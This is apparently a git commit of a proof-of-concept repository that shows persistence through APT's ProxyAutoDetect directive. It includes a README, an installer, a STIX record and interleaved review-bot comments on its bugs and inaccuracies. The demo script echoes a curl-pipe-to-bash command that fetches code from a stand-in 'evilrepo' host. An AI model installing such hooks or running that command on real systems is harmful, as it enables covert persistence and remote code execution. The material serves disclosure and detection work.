commit 1a9b47a7a21cf48ee7207f9d041ea98eeb46cf8c
Author: Phillip Tarrant
Date: Fri Jun 20 15:31:27 2025 +0000

first commit

diff --git a/README.md b/README.md
new file mode 100644
index 0000000..352eefb
--- /dev/null
+++ b/README.md
@@ -0,0 +1,65 @@
+# APT ProxyAutoDetect Persistence (PoC)
+
+This repository demonstrates a technique for achieving execution and persistence by abusing an **undocumented feature** in the Advanced Packaging Tool (APT) on Debian-based Linux systems.
+
+---
+
+## πŸ” Technique Summary
+
+APT supports an undocumented config directive:
+
+ Acquire::http::ProxyAutoDetect "/absolute/path/to/binary";
+
+If placed in a file inside `/etc/apt/apt.conf.d/`, APT will execute the specified binary whenever it attempts to access an HTTP repository (e.g., during `apt update`, `apt install`, etc.).
+
+- `stdout` of the binary is treated as the proxy URL.
+- `stderr` is shown to the user but ignored.
+- No arguments are allowed β€” only absolute binary paths.
+
+---
+
+## 🎯 Use Cases
+
+- **Persistence**: Binary is run every time APT is used, including via automated scripts or cron.
+- **Execution**: Runs code covertly under a legitimate process tree (`apt` β†’ custom binary).
+- **Defense Evasion**: Doesn’t rely on systemd, cron, or shell profile files.
+
+---
+
+## βš™οΈ Demo Setup
+
+1. Install the config and script:
+
+ # This copies the config and shell script to /etc/apt/apt.conf.d/
+ ```
+ sudo ./install.sh
+ ```
+
+2. Run `apt update`:
+
+ ```
+ sudo apt update
+ ```
+
+---
+
+## 🧬 MITRE ATT&CK Mapping
+
+| Tactic | Technique |
+|-----------------|------------------------------------------------|
+| Persistence | [T1546] Event Triggered Execution |
+| Execution | [T1546.008] Application Shimming (analogous) |
+| Defense Evasion | [T1565.001] Stored Data Manipulation |
+
+---
+
+## πŸ“© Disclosure
+
+This issue has been reported to the MITRE ATT&CK team for inclusion as a technique or sub-technique.
+
+---
+
+## πŸ” Author
+
+Phillip Tarrant
+[https://www.linkedin.com/in/phillip-tarrant-cyber/](https://www.linkedin.com/in/phillip-tarrant-cyber/)
diff --git a/poc/30detectproxy b/poc/30detectproxy
new file mode 100644
index 0000000..67a4e06
--- /dev/null
+++ b/poc/30detectproxy
@@ -0,0 +1,2 @@
+// Demonstration of ProxyAutoDetect persistence
+Acquire::http::ProxyAutoDetect "/absolute/path/to/detect-http-proxy";
diff --git a/poc/detect-http-proxy b/poc/detect-http-proxy
new file mode 100644
index 0000000..e7eaf29
--- /dev/null
+++ b/poc/detect-http-proxy
@@ -0,0 +1,10 @@
+#!/bin/bash
+
+# This script is executed automatically by APT when Acquire::http::ProxyAutoDetect is configured.
+# It demonstrates how a threat actor could abuse this feature to execute arbitrary commands.
+
+echo "http://127.0.0.1:8888" # stdout is interpreted as the proxy address
+
+# Simulated threat actor behavior
+echo "If I was a threat actor, I might do something like:" >&2
+echo "/usr/bin/curl -fsSk https://raw.githubusercontent.com/threatactor/evilrepo/main/install.sh | bash" >&2
\ No newline at end of file
diff --git a/poc/install.sh b/poc/install.sh
new file mode 100644
index 0000000..608864b
--- /dev/null
+++ b/poc/install.sh
@@ -0,0 +1,13 @@
+#!/bin/bash
+set -e
+
+BIN_PATH="$(pwd)/detect-http-proxy"
+CONF_PATH="/etc/apt/apt.conf.d/30detectproxy"
+
+echo "[*] Installing detect-http-proxy to ${BIN_PATH}"
+chmod +x detect-http-proxy
+
+echo "[*] Copying APT config to ${CONF_PATH}"
+sudo cp 30detectproxy $CONF_PATH
+
+echo "[*] Done. Now run: sudo apt update"
\ No newline at end of file
diff --git a/stix/apt-proxyautodetect-technique.json b/stix/apt-proxyautodetect-technique.json
new file mode 100644
index 0000000..3a64049
--- /dev/null
+++ b/stix/apt-proxyautodetect-technique.json
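Review bot: The comment on line 1 of 30detectproxy should record the contract APT applies to this directive, because a reader auditing the installed file cannot infer it from the directive alone: the command is run with no arguments, the path must be absolute, and its stdout is read as the proxy URL. apt-transport-http(1) documents this option as `Acquire::http::Proxy-Auto-Detect`, with `ProxyAutoDetect` being the older spelling, so the "undocumented" framing used elsewhere in this commit does not match the man page and the comment should not repeat it. The same directive is installed legitimately by packages such as squid-deb-proxy-client, so a defender baselining `/etc/apt/apt.conf.d/` needs to compare the configured path against known packaged values rather than alert on the directive's mere presence; a comment such as `// Legitimate proxy-discovery helpers use this directive too; what matters is where the path points` would make that clear.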
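Review bot: The proxy address printed on line 6 of detect-http-proxy is a hard-coded `http://127.0.0.1:8888`, and nothing in the repository listens there, so once the config is installed every APT HTTP fetch is routed to that port and `apt update` will fail until the file under `/etc/apt/apt.conf.d/` is removed, unless something happens to be listening; neither this script nor the README states that consequence. Add a comment on that line such as `# demo only: nothing listens here, so apt fetches fail until the config is removed`. The two stderr lines only print text and execute nothing, but the header comment on lines 3-4 says the script demonstrates executing arbitrary commands; it should state explicitly that the printed one-liner is never run, so someone reviewing a host does not mistake the echoed string for an executed command. The file also lacks a trailing newline.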
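Review bot: `BIN_PATH` on line 4 of install.sh is computed and echoed but never used, and the file copied on line 11 is `poc/30detectproxy` with its `/absolute/path/to/detect-http-proxy` placeholder intact, so after installation APT is pointed at a path that does not exist and the demo script is never invoked. Either write the directive from `BIN_PATH` into the installed file or have the README state that the placeholder must be edited by hand before running the installer; the README's claim that the installer copies the script is also not what this code does. `$CONF_PATH` on line 11 is unquoted, and both `chmod +x detect-http-proxy` and `cp 30detectproxy` assume the working directory is `poc/`; `sudo cp 30detectproxy "$CONF_PATH"` fixes the first. A script that writes into `/etc/apt/apt.conf.d/` should also print or provide the removal step (`sudo rm "$CONF_PATH"`) so the host is not left with the directive after the demo.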
@@ -0,0 +1,26 @@
+{
+ "type": "attack-pattern",
+ "spec_version": "2.1",
+ "id": "attack-pattern--4cba5eeb-0031-47d3-9390-9f4fa6b57f88",
+ "created": "2025-06-20T00:00:00Z",
+ "modified": "2025-06-20T00:00:00Z",
+ "name": "APT ProxyAutoDetect Abuse for Execution",
+ "description": "Adversaries may abuse the undocumented Acquire::http::ProxyAutoDetect directive in APT by placing a config file that points to a local binary. This binary is executed whenever APT accesses an HTTP repository, allowing for stealthy persistence and execution.",
+ "x_mitre_platforms": ["Linux"],
+ "x_mitre_tactics": ["persistence", "execution", "defense-evasion"],
+ "x_mitre_permissions_required": ["root"],
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "File monitoring",
+ "Command execution"
+ ],
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ }
+ ],
+ "x_mitre_detection": "Monitor /etc/apt/apt.conf.d/ for unusual files. Look for Acquire::http::ProxyAutoDetect values pointing to local binaries. Detect apt-spawned processes that are not part of expected behavior.",
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": ["Phillip John Tarrant"]
+}
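Review bot: `x_mitre_tactics` is not a property that ATT&CK or STIX 2.1 consumers read; ATT&CK expresses tactics through `kill_chain_phases`, and that array lists only `persistence` while `x_mitre_tactics` also claims execution and defense-evasion, so the standard field and the custom field disagree. Add `{ "kill_chain_name": "mitre-attack", "phase_name": "execution" }` and the same object with `"defense-evasion"` to `kill_chain_phases`, then drop `x_mitre_tactics`. Current ATT&CK data sources are written as `Data Source: Data Component` strings (`Process: Process Creation`, `File: File Creation`, `Command: Command Execution`), which appears to be what the three entries here intend. The description calls the directive undocumented, but apt-transport-http(1) documents it as `Acquire::http::Proxy-Auto-Detect` with `ProxyAutoDetect` as the older spelling, and packages such as squid-deb-proxy-client install it legitimately; `x_mitre_detection` should therefore say to compare the configured path against known packaged values, and note that the spawning parent is APT's http method helper (typically `/usr/lib/apt/methods/http`) rather than the `apt` process itself.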